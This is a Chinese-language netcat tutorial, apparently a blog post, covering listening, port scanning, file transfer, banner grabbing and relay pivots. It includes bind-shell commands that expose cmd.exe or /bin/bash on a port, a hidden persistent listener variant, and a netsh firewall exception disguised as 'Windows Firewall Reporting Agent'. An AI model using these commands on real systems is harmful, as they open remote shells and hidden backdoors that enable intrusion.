NC 在客户端 和 服务器执行
---------------------------------------------------------------------------------------------------------------------------------------------------
执行命令  -l 表示在服务器端启用监听模式
      -p 指定监听的端口
      -e 指定允许远程客户端访问监听端口时执行的程序  
例如:
在远程服务器端执行 NC -l -p 12345  -e cmd.exe   //表示在(windows)服务器监听12345端口,如果远程客户端访问12345端口将会将本地cmd.exe反 弹给客户端执行。
                   nc -l -p 12345  -e /bin/bash    //在(linux)服务器监听12345端口,如果远程客户端访问12345端口会将本地bash反弹给客户端执行。

在本地客户端执行     nc 服务器ip 12345             //  连接服务器的12345端口,如果服务器端指定连接时执行的程序,会将服务器端的cmd.exe等反弹给客户端。
---------------------------------------------------------------------------------------------------------------------------------------------------

其他命令

-d隐藏服务在后台运行

nc -l -p 12345 -e cmd.exe -d    //隐藏窗口服务后台运行

0.71版本   -d 2  设置延迟2秒后执行命令

-L不断打开nc进程,不断开随时连接

     nc -l -p 12345 -e cmd.exe -d  -L

-k 服务器端允许多个客户端连接数

-n  不做域名解析

-v/-vv 显示详细信息

-z syn扫描  -r随机端口  -i 设置延迟扫描

nc -v 192.168.113.1 21,80,443
    nc -v 192.168.113.1 1-200
    nc -v 192.168.113.1 http
输出重定向
        nc -l -p 12345 > test    //输出到test
                           >>           //追加到不覆盖原有内容

-u  使用udp模式

---------------------------------------------------------------------------------------------------------------------------------------------------
可以交互聊天
        nc -n -l -u -p 53
        nc -n -u  ip 53
--------------------------------------------------------------------------------------------------------------------------------------------------
文件传输

远程服务端      nc -l -p 12345 < test.txt     //远程服务器端执行,将服务器端test.txt发送给客户机
本地客户机            nc  ip 12345 > test.txt  //客户端执行,连接服务器获取test.txt

本地做服务器    nc -l -p 12345 > test.txt
远程客户机    nc ip 12345 < test.txt

-w 2 传输完成后2秒后断开

-o test  抓包保存至test

---------------------------------------------------------------------------------------------------------------------------------------------------

获取信息,下载

nc ip 22  //获取某ip的ssh服务信息

nc  域名 port
        GET / HTTP/1.0
        HEAD / HTTP/1.0   获取服务信息  两次回车
---------------------------------------------------------------------------------------------------------------------------------------------------
跳板

A主机        nc  b_ip 33333                          //第三步连接b主机33333端口相当于访问c主机55555端口
B主机        nc -l -p 33333 | nc c_ip 55555   //第二步B主机连接C主机55555端口并通过管道转至本机通过33333端口监听
C主机        nc -l -p 55555                           //第一步在C主机监听55555端口 
        
----------------------------------------------------------------------------------------------------------------------------------------------------

netsh firewall show opmode  显示防火墙工作模式
netsh firewall set opmode mode = enable exceptions =enable profile =all
netsh firewall add portopening tcp 1234 "Windows Firewall Reporting Agent" enable all
netsh firewall show portopening

nc用法的更多相关文章

  1. linux监控命令nc用法

    一.nc命令检测端口的用法 # nc -v -w 10 %IP% -z %PORT% -v 显示指令执行过程. -w <超时秒数> 设置等待连线的时间. -u 表示使用UDP协议 -z 使 ...

  2. nc用法【转】

    linux nc命令使用详解 功能说明:功能强大的网络工具 语 法:nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o& ...

  3. nc用法小记

    By francis_hao    Jun 30,2017   ncat:连接和重定向套接字 概要 ncat [OPTIONS...] [hostname] [port]   描述 ncat 是一个集 ...

  4. nc命令用法举例

    什么是nc nc是netcat的简写,有着网络界的瑞士军刀美誉.因为它短小精悍.功能实用,被设计为一个简单.可靠的网络工具 nc的作用 (1)实现任意TCP/UDP端口的侦听,nc可以作为server ...

  5. 12. nc/netcat 用法举例

    nc命令用法举例 什么是nc nc是netcat的简写,有着网络界的瑞士军刀美誉.因为它短小精悍.功能实用,被设计为一个简单.可靠的网络工具 nc的作用 (1)实现任意TCP/UDP端口的侦听,nc可 ...

  6. nc命令用法举

    什么是nc nc是netcat的简写,有着网络界的瑞士军刀美誉.因为它短小精悍.功能实用,被设计为一个简单.可靠的网络工具 nc的作用 (1)实现任意TCP/UDP端口的侦听,nc可以作为server ...

  7. NC 命令引用了一个高手的文章做收藏

    什么是nc nc是netcat的简写,有着网络界的瑞士军刀美誉.因为它短小精悍.功能实用,被设计为一个简单.可靠的网络工具 nc的作用 (1)实现任意TCP/UDP端口的侦听,nc可以作为server ...

  8. 使用nc传输文件和目录【转】

    方法1,传输文件演示(先启动接收命令) 使用nc传输文件还是比较方便的,因为不用scp和rsync那种输入密码的操作了 把A机器上的一个rpm文件发送到B机器上 需注意操作次序,receiver先侦听 ...

  9. 【转至nmap】nc命令

    什么是nc nc是netcat的简写,有着网络界的瑞士军刀美誉.因为它短小精悍.功能实用,被设计为一个简单.可靠的网络工具 nc的作用 (1)实现任意TCP/UDP端口的侦听,nc可以作为server ...

随机推荐

  1. mysql悲观锁的实现

    https://www.cnblogs.com/laoyeye/p/8228467.html 参考原文链接, //0.开始事务 begin;/begin work;/start transaction ...

  2. 第22课 weak_ptr弱引用智能指针

    一. weak_ptr的概况 (一)weak_ptr的创建 1. 直接初始化:weak_ptr<T> wp(sp); //其中sp为shared_ptr类型 2. 赋值: wp1 = sp ...

  3. mysql 基本操作 四

    1.临时表 当绘画结束时,临时表会自动销毁,无法用show tables 查看 临时表. MariaDB [jason]> create temporary table tmp(pro ),ci ...

  4. Oracle性能调优之物化视图用法简介

    目录 一.物化视图简介 二.实践:创建物化视图 一.物化视图简介 物化视图分类 物化视图分类,物化视图语法和as后面的sql分为: (1) 基于主键的物化视图(主键物化视图) (2)基于Rowid的物 ...

  5. github 白嫖记(一)

    位运算 按位操作符:0或者1之间的运算 a|b 或 任意一个为1结果为1 console.log(0 | 1) //1 console.log(1 | 0) //1 console.log(1 | 1 ...

  6. 图解微信小程序---实现页面的跳转与返回操作

    图解微信小程序---实现页面的跳转与返回操作 代码笔记 操作步骤 第一步:在app.json配置文件中,创建跳转页面 第二步:编写首页跳转(注意跳转方式,和设置点击样式类名) 第三步:编写首页样式 第 ...

  7. Redis(序)应用场景

    前言 在阅读了<大型网站技术架构:核心原理与案例分析>书后,稍微了解了Redis在大型网站架构中的应用场景和目的. 大型网站都是从小用户量,小流量的网站演变过来的,在小型网站的架构之初,L ...

  8. 【JVM】【linux】linux上执行jmap命令查看JVM内存使用情况,报错:sun.jvm.hotspot.debugger.NoSuchSymbolException: Could not find symbol "gHotSpotVMTypes" in any of the known library name

    运行命令: jmap -heap 报错如下: Attaching to process ID , please wait... sun.jvm.hotspot.debugger.NoSuchSymbo ...

  9. 手写Spring+demo+思路

    我在学习Spring的时候,感觉Spring是很难的,通过学习后,发现Spring没有那么难,只有你去学习了,你才会发现,你才会进步 1.手写Spring思路: 分为配置.初始化.运行三个阶段如下图 ...

  10. MarkDown 常用语法规则

    > # 标题 # 标题1:h1的效果 ## 标题2:h2的效果 ### 标题3:h3的效果 #### 标题4:h4的效果 ##### 标题5:h5的效果 ###### 标题6:h6的效果 ### ...